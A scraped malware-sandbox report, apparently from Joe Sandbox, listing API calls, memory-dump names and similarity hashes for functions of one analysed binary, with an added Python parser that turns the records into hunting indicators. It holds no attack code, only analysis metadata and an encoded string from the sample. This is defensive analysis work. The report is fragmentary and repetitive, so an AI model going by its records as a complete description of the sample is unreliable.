• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
• Instruction ID: 856d399887dd27b7ff2090b6ba205bffd5fa5b63c1769944cd833ed7d7811f75
• Opcode Fuzzy Hash: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
• Instruction Fuzzy Hash: 2CF0C272E082049FCB10AF69D88879FBFB4EF84310F00843AE95497380D6749515CB97
Uniqueness

Uniqueness Score: -1.00%

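The per-function records above (API calls with their call-site references, the Opcode ID and Instruction Fuzzy Hash used for similarity lookups, and the memory dump the function was lifted from) are what an analyst would carry into a hunting workflow, but the report presents them as flat text. The following parser is an added example written for this page, not code from the report or from Joe Sandbox. The sample input is copied from two records on this page with the extraction whitespace removed. Two things are assumptions, not documented format: that a record ends at its "Uniqueness Score" line, and the field layout of the .sdmp file name (process index, dump round, dump id, base address, page protection, ...), which is inferred from the fact that process 15, round 2 and base 0x400000 reappear in the snapshot name "hcaresult_15_2_400000_...". The PAGE_* values are the Windows winnt.h constants.

```python
"""Parse the per-function 'Similarity' records of a Joe Sandbox report.

Added example, not part of the report or of Joe Sandbox itself. The record
layout (one record per 'Uniqueness Score' line) and the meaning of the
.sdmp name fields are inferred from this page and are assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: two records copied from this page, whitespace trimmed.
SAMPLE = r"""APIs
• Part of subcall function 00407935: CharNextA.USER32(?,00000000,74DF3160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
• lstrlenA.KERNEL32(?,00000000,?,?,?,00000000,?,004085CF), ref: 004081BE
• GetFileAttributesA.KERNEL32(00000000,?,?,00000000,?,?,?,00000000,?,004085CF), ref: 004081F7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\
• API String ID: 3248276644-3404278061
• Opcode ID: 2da7ec1753567bed1e155ededaacee0951334442434f81bdc17e756d419ccca8
• Instruction Fuzzy Hash: D6118FB0508314AAD710ABA69A4167A7BD89F05354F46447FECC0AA285CB3C5852866F
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
• Instruction Fuzzy Hash: 2CF0C272E082049FCB10AF69D88879FBFB4EF84310F00843AE95497380D6749515CB97
Uniqueness
Uniqueness Score: -1.00%
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR: ".
API_CALL = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)

# Windows page protection constants (winnt.h); used to read the .sdmp name.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)    # one dict per API call line
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "Opcode ID", "API ID", ...
    uniqueness_score: str = ""

    def calls(self, api_name):
        """True if this function, or a subcall it makes, calls api_name."""
        return any(a["name"] == api_name for a in self.apis)


def parse_records(text):
    records, current, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if line.startswith("Uniqueness Score:"):   # assumed record terminator
            current.uniqueness_score = line.split(":", 1)[1].strip()
            records.append(current)
            current, section = FunctionRecord(), None
            continue
        if line.startswith("• "):
            line = line[2:]
        if section == "APIs":
            m = API_CALL.match(line)
            if m:
                call = m.groupdict()
                call["args"] = call["args"].split(",") if call["args"] else []
                call["in_subcall"] = call["caller"] is not None
                current.apis.append(call)
        elif section == "Strings":
            current.strings.append(line)
        elif ": " in line:
            key, value = line.split(": ", 1)
            if key == "Associated":                # several dumps per record
                current.fields.setdefault(key, []).append(value)
            else:
                current.fields[key] = value
    return records


def parse_dump_name(name):
    """Decode an .sdmp name; field layout is an assumption (see lead-in)."""
    parts = name.removesuffix(".sdmp").split(".")
    protect = int(parts[4], 16)
    return {"process": int(parts[0], 16), "round": int(parts[1], 16),
            "base": int(parts[3], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect))}


def source_region(record):
    """Process, base address and protection of the dump the function came from."""
    return parse_dump_name(record.fields["Source File"].split(",")[0])


def find_by_api(records, api_name):
    return [r for r in records if r.calls(api_name)]


def hunting_indicators(records):
    """Deduplicated (Opcode ID, Instruction Fuzzy Hash) pairs for similarity lookups."""
    seen = set()
    for r in records:
        key = (r.fields.get("Opcode ID"), r.fields.get("Instruction Fuzzy Hash"))
        if all(key) and key not in seen:
            seen.add(key)
            yield key


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.fields.get("API ID"), repr(r.fields.get("String ID")), source_region(r))
    print([a["name"] for a in find_by_api(recs, "GetFileAttributesA")[0].apis])
```

The dump-name decoding is the part worth checking against your own reports: on this page the code region at 0x401000 carries 0x20 (PAGE_EXECUTE_READ) while the data regions at 0x40A000 and later carry 0x04 or 0x08, which is consistent with the assumed layout but does not prove it.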
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                                                                                                                                  • Instruction ID: 373024fc2fed516bdc636a623b7a3c01618f37309bfd328d060bf71c45cb50f6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FE18A75E05269CFEB64CF68C980B99BBB1BB48300F1081EAD84DA7381D774AE85CF55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
                                                                                                                                                                                                                                  • Instruction ID: a08f90893e9a4040dbcaa68aabc4f5c37fecb49a8b953bcbec771c1c1b16f75e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1E18974E05269CFEB64CF68C984BA9BBB1BB48300F1481EAD859B7381D7349E85CF15
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Global$AllocFree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3394109436-0
                                                                                                                                                                                                                                  • Opcode ID: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                                                                                                                                  • Instruction ID: cf37d5954fa70898b434e0d26c6706b10c8171271484cbeb9454a15f2979c00d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58E19B74E05269CFEB64CF68C984BA9BBB1BB48300F1485EAD849A7381D7349E85CF15
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                                                                                                                                  • Instruction ID: 6ef1666d030b3683f745449ade9432935f6c1ed2423b4b2fea7fa3c30e0d11e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFD169B4D05269CFEB64CF68C984B99BBB1BB48300F1081EAD84DA7391D734AE85CF55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
• Opcode ID: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
• Instruction ID: aa20071d88737d2ca076d9582247293cc4c89cd0404862d20b3ad10084441af9
• Opcode Fuzzy Hash: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
• Instruction Fuzzy Hash: 813150B09083018FD710EF25C94835ABBF4FB84315F10886EF489A7391D7799A89DF9A
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: FileRead
• String ID: <@
• API String ID: 2738559852-4072043054
• Opcode ID: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
• Instruction ID: af84ff8d7bbf5bb76e19132ef8cd2b24e5e30c6edf1d6b1d64d2a00a1082e161
• Opcode Fuzzy Hash: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
• Instruction Fuzzy Hash: 1EF0ACB1904309AFC700EF69C58454EBBF4AB48354F408839E85993251E734E604CF56
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNEL32 ref: 00403159
Strings
• 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 00403141
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
• API String ID: 2591292051-244690609
• Opcode ID: 7220984d86149b75493436dbbda63972d97fcd78ed879eff71d07d38dd4f9017
• Instruction ID: cae25ad1085ea1b7b33e0ee8e1dfa0938857f6c35aa13dd2a3c4ee0daf51729b
• Opcode Fuzzy Hash: 7220984d86149b75493436dbbda63972d97fcd78ed879eff71d07d38dd4f9017
• Instruction Fuzzy Hash: 1FC012B180D7519FC3016F3068494657FB06E11305756487EF8C1A6093D73845048657
Uniqueness
Uniqueness Score: -1.00%

APIs
• ReadFile.KERNEL32 ref: 00403292
• SetFilePointer.KERNEL32 ref: 00403316
  • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: File$PointerReadwsprintf
• String ID:
• API String ID: 2027716870-0
• Opcode ID: 2a1d3a7d486c6b86bccdea9d2ad81ee3c8c98c4cef3a960bb8e5e7f735770045
• Instruction ID: 8e5637f0c6afa0013300979c193a8b9475ce08824852a7f6775797156de60d7d
• Opcode Fuzzy Hash: 2a1d3a7d486c6b86bccdea9d2ad81ee3c8c98c4cef3a960bb8e5e7f735770045
• Instruction Fuzzy Hash: CC31B2719082549FD721DF28C8457EABBF5BB41305F4481BFE88967381CB385A85CF4A
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID:
• API String ID: 3712363035-0
• Opcode ID: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
• Instruction ID: e526153969689a3bb24f951f69113ce00b5f3314808de7d96251afda99080b29
• Opcode Fuzzy Hash: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
• Instruction Fuzzy Hash: 9F01BDB4A083058FE700DF65C55874BBBF4BB88348F40892CE984AB380D7B9D5498BDA
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32 ref: 00407A85
• CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                                                                                                  • Opcode ID: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                                                                                                                                  • Instruction ID: df9a40891ed5a6603638aa450cb2a5da2b508cd079f162d5418714098e0b767a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2F0D4B06083059FC700EF29D48874EBBF4BF88354F50892CE89987391D374D9848FA2
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(?,00000000,00000000), ref: 00407A53
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(?,?,00000000,00000000), ref: 00407A69
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                  • Opcode ID: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
                                                                                                                                                                                                                                  • Instruction ID: 98ca1ea5d0757272cd0f040fa3ed5e2b23fe950f5b76aa7c06b1bcfd26805678
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE08CB0A04708ABC710EF78CC8481EBABCAA54320B90462CF5A5C32D1C234A9408B36
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
